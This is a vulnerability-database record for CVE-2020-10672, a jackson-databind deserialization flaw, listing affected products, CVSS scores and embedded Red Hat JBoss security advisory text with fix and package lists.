iQIVAwUBXzqIS9zjgjWX9erEAQjYNxAAk4rojlcRbfjwu0wlWLTU1MbxQNclVtVh MpQnFzyvJVVXX0lslx7NGxHlRNWRgqI/XC1QDqlHpRs4du5/a2Uj+8c5u+WPQefF QCqOvSntbMli42/I7+fCehLVofx/HkuAVcBoGrIGby1E4rddDljh4bH3r43I7wa5 HN9ki8uFAy8bIAzfXW+RB4rxtnsAABv/VFoH1fWmrXCXE6A6aG+AU86ddty0JQHN JhQp6v/X/3ccCvHYTAO8vlbqIJ4fE86e1+5oRBor+4ZD4mMVzGKm4cf8CMPXsKIB 9dFGo8WHFBgEi4hBbBFtFfaE2DGZ6K4Q7X0IAhiiYJmpPg8NgzGiqVvOAG+/OrBz DE84ZPxZwS1zR82wwIyHP4W5mYIhQTxhtp+E9Klu4gpFIAmK8bVfGf2Ub0HOCS6z sbN1Eiv0SBfWRHBfBkuRTBd0aEcmGRNl4GSXzXtanTf0OhFk/4pxdJPmKDEBFWvg 3dtwFi7+/8JoAch8GKQCo4UoSo6etQu45sUH6Q8ozuxYA72+J9K7cpwp/fVhiYRT nruC+2HDuugrC8UVJ/24E++49omdSXAm+UR9tvkFdVU3IpXLJNWO8s4QbrGC7CN7 Lvg/ukygGhrEEyQ1J9yYSeeNISQWJGOSKj/bgYRAh/AbX/QcZZfus7ppAasNjndn Bk4PSTq9yaw= =ZNiG -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.3"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "communications evolved communications application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "retail sales audit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.0.15"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "global lifecycle management opatch",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1.20"
},
{
"_id": null,
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.9.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.10.4"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "communications instant messaging server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.0.1.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.2"
},
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications session report manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "jd edwards enterpriseone orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.0.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.0.2.25"
},
{
"_id": null,
"model": "agile plm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.3.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.2"
},
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.5.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.7"
},
{
"_id": null,
"model": "autovue for agile product lifecycle management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.2"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0.1"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.0"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "financial services retail customer analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.0"
},
{
"_id": null,
"model": "communications calendar server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.3"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0"
},
{
"_id": null,
"model": "gnu/linux",
"scope": null,
"trust": 0.8,
"vendor": "debian",
"version": null
},
{
"_id": null,
"model": "jackson-databind",
"scope": "eq",
"trust": 0.8,
"vendor": "fasterxml",
"version": "2.9.10.4"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003144"
},
{
"db": "NVD",
"id": "CVE-2020-10672"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:debian:debian_linux",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fasterxml:jackson-databind",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003144"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "158884"
},
{
"db": "PACKETSTORM",
"id": "159083"
},
{
"db": "PACKETSTORM",
"id": "159081"
},
{
"db": "PACKETSTORM",
"id": "159080"
},
{
"db": "PACKETSTORM",
"id": "159082"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1150"
}
],
"trust": 1.3
},
"cve": "CVE-2020-10672",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2020-10672",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-003144",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-163174",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2020-10672",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-003144",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-10672",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2020-10672",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-003144",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-1150",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-163174",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163174"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1150"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003144"
},
{
"db": "NVD",
"id": "CVE-2020-10672"
},
{
"db": "NVD",
"id": "CVE-2020-10672"
}
]
},
"description": {
"_id": null,
"data": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms). FasterXML jackson-databind There is an unspecified vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x prior to 2.9.10.4 due to insecure deserialization by org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aries.transaction.jms) . A remote attacker could exploit this vulnerability with specially crafted input to execute arbitrary code on the system. Description:\n\nRed Hat Decision Manager is an open source decision management platform\nthat combines business rules management, complex event processing, Decision\nModel \u0026 Notation (DMN) execution, and Business Optimizer for solving\nplanning problems. It automates business decisions and makes that logic\navailable to the entire business. \n\nIt is recommended to halt the server by stopping the JBoss Application\nServer process before installing this update; after installing the update,\nrestart the server by starting the JBoss Application Server process. \n\nSecurity Fix(es):\n\n* apache-commons-beanutils: does not suppresses the class property in\nPropertyUtilsBean by default (CVE-2019-10086)\n\n* cxf: does not restrict the number of message attachments (CVE-2019-12406)\n\n* cxf: OpenId Connect token service does not properly validate the clientId\n(CVE-2019-12419)\n\n* hibernate-validator: safeHTML validator allows XSS (CVE-2019-10219)\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth\n(CVE-2019-9514)\n\n* HTTP/2: flood using SETTINGS frames results in unbounded memory growth\n(CVE-2019-9515)\n\n* HTTP/2: large amount of data requests leads to denial of service\n(CVE-2019-9511)\n\n* jackson-databind: Multiple serialization gadgets (CVE-2019-17531,\nCVE-2019-16943, CVE-2019-16942, CVE-2019-17267, CVE-2019-14540,\nCVE-2019-16335, CVE-2019-14893, CVE-2019-14892, CVE-2020-9546,\nCVE-2020-9547, CVE-2020-9548, CVE-2020-10969, CVE-2020-10968,\nCVE-2020-11111, CVE-2020-11112, CVE-2020-11113, CVE-2020-11619,\nCVE-2020-11620, CVE-2019-20330, CVE-2020-8840)\n\n* jackson-databind: mishandles the interaction between serialization\ngadgets and typing which could result in remote command \nexecution (CVE-2020-10672, CVE-2020-10673)\n\n* keycloak: adapter endpoints are exposed via arbitrary URLs\n(CVE-2019-14820)\n\n* keycloak: missing signatures validation on CRL used to verify client\ncertificates (CVE-2019-3875)\n\n* keycloak: SAML broker does not check existence of signature on document\nallowing any user impersonation (CVE-2019-10201)\n\n* keycloak: CSRF check missing in My Resources functionality in the Account\nConsole (CVE-2019-10199)\n\n* keycloak: cross-realm user access auth bypass (CVE-2019-14832)\n\n* netty: HTTP Request Smuggling due to Transfer-Encoding whitespace\nmishandling (CVE-2020-7238)\n\n* SmallRye: SecuritySupport class is incorrectly public and contains a\nstatic method to access the current threads context class loader\n(CVE-2020-1729)\n\n* thrift: Out-of-bounds read related to TJSONProtocol or\nTSimpleJSONProtocol (CVE-2019-0210)\n\n* thrift: Endless loop when feed with specific input data (CVE-2019-0205)\n\n* undertow: possible Denial Of Service (DOS) in Undertow HTTP server\nlistening on HTTPS (CVE-2019-14888)\n\n* wildfly: The \u0027enabled-protocols\u0027 value in legacy security is not\nrespected if OpenSSL security provider is in use (CVE-2019-14887)\n\n* wildfly-core: Incorrect privileges for \u0027Monitor\u0027, \u0027Auditor\u0027 and\n\u0027Deployer\u0027 user by default (CVE-2019-14838)\n\n* xml-security: Apache Santuario potentially loads XML parsing code from an\nuntrusted source (CVE-2019-12400)\n\nFor more details about the security issues and their impact, the CVSS\nscore, acknowledgements, and other related information, see the CVE pages\nlisted in the References section. \n\nThe References section of this erratum contains a download link for the\nupdate. You must be logged in to download the update. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: Red Hat JBoss Enterprise Application Platform 7.3.2 security update\nAdvisory ID: RHSA-2020:3461-01\nProduct: Red Hat JBoss Enterprise Application Platform\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:3461\nIssue date: 2020-08-17\nCVE Names: CVE-2019-14900 CVE-2020-1710 CVE-2020-1748 \n CVE-2020-10672 CVE-2020-10673 CVE-2020-10683 \n CVE-2020-10687 CVE-2020-10693 CVE-2020-10714 \n CVE-2020-10718 CVE-2020-10740 CVE-2020-14297 \n=====================================================================\n\n1. Summary:\n\nAn update is now available for Red Hat JBoss Enterprise Application\nPlatform 7.3 for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat JBoss EAP 7.3 for RHEL 6 Server - noarch\n\n3. Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. \n\nThis release of Red Hat JBoss Enterprise Application Platform 7.3.2 serves\nas a replacement for Red Hat JBoss Enterprise Application Platform 7.3.1,\nand includes bug fixes and enhancements. See the Red Hat JBoss Enterprise\nApplication Platform 7.3.2 Release Notes for information about the most\nsignificant bug fixes and enhancements included in this release. \n\nSecurity Fix(es):\n\n* wildfly: exposed setting of TCCL via the EmbeddedManagedProcess API\n(CVE-2020-10718)\n\n* dom4j: XML External Entity vulnerability in default SAX parser\n(CVE-2020-10683)\n\n* wildfly-elytron: session fixation when using FORM authentication\n(CVE-2020-10714)\n\n* wildfly-undertow: Undertow: Incomplete fix for CVE-2017-2666 due to\npermitting invalid characters in HTTP requests (CVE-2020-10687)\n\n* jackson-databind: mishandles the interaction between serialization\ngadgets and typing which could result in remote command execution\n(CVE-2020-10673)\n\n* hibernate-core: hibernate: SQL injection issue in Hibernate ORM\n(CVE-2019-14900)\n\n* wildfly: unsafe deserialization in Wildfly Enterprise Java Beans\n(CVE-2020-10740)\n\n* jackson-databind: mishandles the interaction between serialization\ngadgets and typing which could result in remote command execution\n(CVE-2020-10672)\n\n* undertow: EAP: field-name is not parsed in accordance to RFC7230\n(CVE-2020-1710)\n\n* hibernate-validator: Improper input validation in the interpolation of\nconstraint error messages (CVE-2020-10693)\n\n* wildfly: Improper authorization issue in WildFlySecurityManager when\nusing alternative protection domain (CVE-2020-1748)\n\n* wildfly: Some EJB transaction objects may get accumulated causing Denial\nof Service (CVE-2020-14297)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, see the CVE page(s) listed in the\nReferences section. \n\n4. Solution:\n\nBefore applying this update, ensure all previously released errata relevant\nto your system have been applied. \n\nFor details about how to apply this update, see:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1666499 - CVE-2019-14900 hibernate: SQL injection issue in Hibernate ORM\n1694235 - CVE-2020-10683 dom4j: XML External Entity vulnerability in default SAX parser\n1785049 - CVE-2020-10687 Undertow: Incomplete fix for CVE-2017-2666 due to permitting invalid characters in HTTP requests\n1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230\n1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages\n1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain\n1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication\n1828476 - CVE-2020-10718 wildfly: exposed setting of TCCL via the EmbeddedManagedProcess API\n1834512 - CVE-2020-10740 wildfly: unsafe deserialization in Wildfly Enterprise Java Beans\n1853595 - CVE-2020-14297 wildfly: Some EJB transaction objects may get accumulated causing Denial of Service\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-18793 - [GSS](7.3.z) Upgrade Hibernate ORM from 5.3.16 to 5.3.17\nJBEAP-19095 - [GSS](7.3.z) Upgrade wildfly-http-client from 1.0.20 to 1.0.21\nJBEAP-19134 - (7.3.z) Upgrade HAL from 3.2.8.Final-redhat-00001 to 3.2.9.Final\nJBEAP-19185 - (7.3.z) Upgrade IronJacamar from 1.4.20.Final to 1.4.22.Final\nJBEAP-19203 - (7.3.z) WFCORE-4850 - Updating mockserver to 5.9.0. Exclusion of dependency from xom.io7m\nJBEAP-19205 - (7.3.z) Upgrade WildFly Core from 10.1.5.Final-redhat-00001 to 10.1.x\nJBEAP-19269 - [GSS](7.3.z) Upgrade jboss-logmanager from 2.1.14.Final to 2.1.15.Final\nJBEAP-19322 - (7.3.z) Upgrade XNIO from 3.7.7 to 3.7.8.SP1\nJBEAP-19325 - (7.3.z) Upgrade Infinispan from 9.4.18.Final-redhat-00001 to 9.4.19.Final-redhat-00001\nJBEAP-19397 - (7.3.z) Upgrade JSF based on Mojarra 2.3.9.SP09-redhat-00001 to 2.3.9.SP11-redhat-00001\nJBEAP-19409 - Tracker bug for the EAP 7.3.2 release for RHEL-6\nJBEAP-19529 - (7.3.z) Update PR template to include PR-processor hints. \nJBEAP-19564 - [GSS](7.3.z) Upgrade jboss-ejb-client from 4.0.31.Final-redhat-00001 to 4.0.33.Final-redhat-00001\nJBEAP-19585 - [GSS](7.3.z) Upgrade org.jboss.genericjms from 2.0.4 to 2.0.6\nJBEAP-19617 - (7.3.z) Upgrade wildfly-naming-client from 1.0.12.Final-redhat-00001 to 1.0.13.Final-redhat-00001\nJBEAP-19619 - (7.3.z) Upgrade JBoss JSF API from 3.0.0.SP02-redhat-00001 to 3.0.0.SP04-redhat-00001\nJBEAP-19673 - (7.3.z) [WFCORE] Upgrade WildFly Common to 1.5.2.Final\nJBEAP-19674 - (7.3.z) [WFCORE] Upgrade galleon and wildfly-galleon-plugins from 4.1.2.Final to 4.2.4.Final\nJBEAP-19874 - [GSS](7.3.z) Upgrade wildfly-http-client from 1.0.21.Final-redhat-00001 to 1.0.22.Final-redhat-00001\n\n7. Package List:\n\nRed Hat JBoss EAP 7.3 for RHEL 6 Server:\n\nSource:\neap7-dom4j-2.1.3-1.redhat_00001.1.el6eap.src.rpm\neap7-elytron-web-1.6.2-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-glassfish-jsf-2.3.9-11.SP11_redhat_00001.1.el6eap.src.rpm\neap7-hal-console-3.2.9-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-hibernate-5.3.17-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-hibernate-validator-6.0.20-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-infinispan-9.4.19-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-ironjacamar-1.4.22-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-jackson-annotations-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jackson-core-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jackson-databind-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jackson-jaxrs-providers-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jackson-modules-base-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jackson-modules-java8-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jboss-genericjms-2.0.6-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP04_redhat_00001.1.el6eap.src.rpm\neap7-jboss-logmanager-2.1.15-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-jboss-server-migration-1.7.1-7.Final_redhat_00009.1.el6eap.src.rpm\neap7-jboss-xnio-base-3.7.8-1.SP1_redhat_00001.1.el6eap.src.rpm\neap7-netty-4.1.48-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-undertow-2.0.30-4.SP4_redhat_00001.1.el6eap.src.rpm\neap7-wildfly-7.3.2-4.GA_redhat_00002.1.el6eap.src.rpm\neap7-wildfly-common-1.5.2-1.Final_redhat_00002.1.el6eap.src.rpm\neap7-wildfly-elytron-1.10.7-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-wildfly-http-client-1.0.22-1.Final_redhat_00001.1.el6eap.src.rpm\n\nnoarch:\neap7-dom4j-2.1.3-1.redhat_00001.1.el6eap.noarch.rpm\neap7-glassfish-jsf-2.3.9-11.SP11_redhat_00001.1.el6eap.noarch.rpm\neap7-hal-console-3.2.9-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-core-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-entitymanager-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-envers-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-java8-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-validator-6.0.20-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-hibernate-validator-cdi-6.0.20-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-cachestore-jdbc-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-cachestore-remote-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-client-hotrod-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-commons-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-core-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-hibernate-cache-commons-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-hibernate-cache-spi-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-infinispan-hibernate-cache-v53-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-common-api-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-common-impl-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-common-spi-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-core-api-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-core-impl-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-deployers-common-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-jdbc-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-ironjacamar-validator-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-annotations-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-core-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-databind-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-dat